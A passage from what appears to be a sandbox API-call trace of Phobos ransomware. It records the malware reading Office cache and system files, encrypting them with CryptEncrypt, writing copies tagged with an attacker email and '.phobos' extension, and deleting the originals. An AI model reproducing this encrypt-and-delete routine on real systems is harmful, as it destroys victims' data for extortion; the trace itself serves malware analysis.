(normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.xml.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0142.410] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32968) returned 1 [0142.410] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0142.410] ReadFile (in: hFile=0x130, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x10b2, lpOverlapped=0x0) returned 1 [0142.515] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x10c0, dwBufLen=0x10c0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x10c0) returned 1 [0142.515] WriteFile (in: hFile=0x140, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x10c0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x10c0, lpOverlapped=0x0) returned 1 [0142.516] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d28) returned 1 [0142.516] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0142.516] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0142.516] CryptDestroyKey (hKey=0xa32d28) returned 1 [0142.516] WriteFile (in: hFile=0x140, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0142.517] CryptDestroyKey (hKey=0xa32968) returned 1 [0142.517] CloseHandle (hObject=0x130) returned 1 [0142.517] CloseHandle (hObject=0x140) returned 1 [0142.517] DeleteFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.xml")) returned 1 [0142.518] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0142.518] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0142.519] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=6421) returned 1 [0142.519] CloseHandle (hObject=0x140) returned 1 [0142.519] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.xml")) returned 0x2020 [0142.519] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.xml.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0142.519] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0142.519] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0142.519] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0142.519] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.xml.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0142.520] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32968) returned 1 [0142.520] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0142.520] ReadFile (in: hFile=0x140, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x1915, lpOverlapped=0x0) returned 1 [0143.152] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x1920, dwBufLen=0x1920 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x1920) returned 1 [0143.152] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x1920, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x1920, lpOverlapped=0x0) returned 1 [0143.154] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32da8) returned 1 [0143.154] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0143.154] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0143.154] CryptDestroyKey (hKey=0xa32da8) returned 1 [0143.154] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0143.154] CryptDestroyKey (hKey=0xa32968) returned 1 [0143.154] CloseHandle (hObject=0x140) returned 1 [0143.154] CloseHandle (hObject=0x130) returned 1 [0143.154] DeleteFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.xml")) returned 1 [0143.155] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0143.155] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0143.156] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=16683) returned 1 [0143.156] CloseHandle (hObject=0x130) returned 1 [0143.156] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.xml")) returned 0x2020 [0143.156] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.xml.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0143.157] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0143.157] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0143.157] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0143.157] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.xml.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0143.157] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32968) returned 1 [0143.157] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0143.157] ReadFile (in: hFile=0x130, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x412b, lpOverlapped=0x0) returned 1 [0143.725] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x4130, dwBufLen=0x4130 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x4130) returned 1 [0143.725] WriteFile (in: hFile=0x140, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x4130, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x4130, lpOverlapped=0x0) returned 1 [0143.726] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32da8) returned 1 [0143.726] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0143.726] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0143.727] CryptDestroyKey (hKey=0xa32da8) returned 1 [0143.727] WriteFile (in: hFile=0x140, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0143.727] CryptDestroyKey (hKey=0xa32968) returned 1 [0143.727] CloseHandle (hObject=0x130) returned 1 [0143.727] CloseHandle (hObject=0x140) returned 1 [0143.728] DeleteFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.xml")) returned 1 [0143.729] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0143.729] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0143.729] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=20577) returned 1 [0143.729] CloseHandle (hObject=0x140) returned 1 [0143.729] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.xml")) returned 0x2020 [0143.730] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.xml.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0143.730] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0143.730] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0143.730] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0143.730] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.xml.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0143.730] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32968) returned 1 [0143.730] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0143.730] ReadFile (in: hFile=0x140, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x5061, lpOverlapped=0x0) returned 1 [0143.820] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x5070, dwBufLen=0x5070 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x5070) returned 1 [0143.820] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x5070, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x5070, lpOverlapped=0x0) returned 1 [0143.821] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d28) returned 1 [0143.821] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0143.821] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0143.821] CryptDestroyKey (hKey=0xa32d28) returned 1 [0143.821] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0143.822] CryptDestroyKey (hKey=0xa32968) returned 1 [0143.822] CloseHandle (hObject=0x140) returned 1 [0143.822] CloseHandle (hObject=0x130) returned 1 [0143.822] DeleteFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.xml")) returned 1 [0143.824] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0143.824] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0143.825] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=8723) returned 1 [0143.825] CloseHandle (hObject=0x130) returned 1 [0143.825] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.xml")) returned 0x2020 [0143.825] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.xml.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0143.825] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0143.825] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0143.825] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0143.825] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.xml.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0143.826] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32968) returned 1 [0143.826] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0143.826] ReadFile (in: hFile=0x130, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x2213, lpOverlapped=0x0) returned 1 [0143.846] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x2220, dwBufLen=0x2220 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x2220) returned 1 [0143.846] WriteFile (in: hFile=0x140, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x2220, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x2220, lpOverlapped=0x0) returned 1 [0143.847] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa327e8) returned 1 [0143.847] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0143.847] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0143.847] CryptDestroyKey (hKey=0xa327e8) returned 1 [0143.847] WriteFile (in: hFile=0x140, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0143.848] CryptDestroyKey (hKey=0xa32968) returned 1 [0143.848] CloseHandle (hObject=0x130) returned 1 [0143.848] CloseHandle (hObject=0x140) returned 1 [0143.848] DeleteFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.xml")) returned 1 [0143.849] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0143.849] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr1.dat" (normalized: "c:\\programdata\\microsoft\\network\\downloader\\qmgr1.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0143.850] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=4194304) returned 1 [0143.850] CloseHandle (hObject=0x140) returned 1 [0143.850] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr1.dat" (normalized: "c:\\programdata\\microsoft\\network\\downloader\\qmgr1.dat")) returned 0x120 [0143.850] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr1.dat" (normalized: "c:\\programdata\\microsoft\\network\\downloader\\qmgr1.dat"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr1.dat.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\network\\downloader\\qmgr1.dat.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 1 [0143.850] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr1.dat.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\network\\downloader\\qmgr1.dat.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0143.850] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc40 | out: lpNewFilePointer=0x0) returned 1 [0143.850] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc40 | out: lpNewFilePointer=0x0) returned 1 [0143.850] ReadFile (in: hFile=0x140, lpBuffer=0x34b0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2f4fc4c, lpOverlapped=0x0 | out: lpBuffer=0x34b0058*, lpNumberOfBytesRead=0x2f4fc4c*=0x40000, lpOverlapped=0x0) returned 1 [0143.890] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x155555, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc40 | out: lpNewFilePointer=0x0) returned 1 [0143.890] ReadFile (in: hFile=0x140, lpBuffer=0x34f0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2f4fc4c, lpOverlapped=0x0 | out: lpBuffer=0x34f0058*, lpNumberOfBytesRead=0x2f4fc4c*=0x40000, lpOverlapped=0x0) returned 1 [0144.032] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x3c0000, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc40 | out: lpNewFilePointer=0x0) returned 1 [0144.032] ReadFile (in: hFile=0x140, lpBuffer=0x3530058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2f4fc4c, lpOverlapped=0x0 | out: lpBuffer=0x3530058*, lpNumberOfBytesRead=0x2f4fc4c*=0x40000, lpOverlapped=0x0) returned 1 [0144.243] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc30, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc9c | out: phKey=0x2f4fc9c*=0xa327e8) returned 1 [0144.243] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0144.244] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc50*=0xc0050, dwBufLen=0xc0050 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc50*=0xc0050) returned 1 [0144.251] CryptDestroyKey (hKey=0xa327e8) returned 1 [0144.251] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc78 | out: lpNewFilePointer=0x0) returned 1 [0144.251] WriteFile (in: hFile=0x140, 